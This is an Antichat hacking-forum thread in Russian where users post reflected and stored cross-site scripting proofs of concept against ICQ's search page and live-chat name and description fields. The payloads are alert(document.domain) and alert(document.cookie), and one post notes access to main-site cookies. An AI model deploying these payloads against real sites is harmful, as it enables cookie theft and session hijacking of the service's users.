ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Skype, IRC, ICQ, Jabber и другие IM (https://forum.antichat.xyz/forumdisplay.php?f=13)
-   -   XSS icq.com (https://forum.antichat.xyz/showthread.php?t=432429)

kingbeef 02.11.2015 23:20
Код:
http://search.icq.com/search/results.php?q=%5Cx3C%5Cx2Fscript%5Cx3E%5Cx3Cscript%5Cx3Ealert%5Cx28document.domain%5Cx29%5Cx3C%5Cx2Fscript%5Cx3E&ch_id=start&search_mode=web
Куки с основного сайта.

Poltergeist 03.11.2015 00:58
Т.н. reflected XSS на этом search.icq.com уже вычищают-вычищают много лет, и все никак, как видно. Их и постили на сайтах, где публикуют XSS, и я находил какие-то давным-давно. Помню, в 2012-м после редизайна страница профайла просто кишела stored XSS. Их там было порядка 15 штук на разных страницах. Потом пофиксили, но криворуко, поэтому был второй дубль, правда эксплуатация была чуть более замудренной. Но было весело.

Poltergeist 14.02.2016 21:06
Stored XSS в ICQ лайвчатах. Пример:

Код:
https://icq.com/chat/AqGIzmxQTeANPGrCCw
Уязвимы поля "Имя" и "Описание".

Код HTML:
">alert(document.cookie)
">alert("Stored XSS")
Лайвчат можно создать через приложение для iOS или Android.


Время: 15:18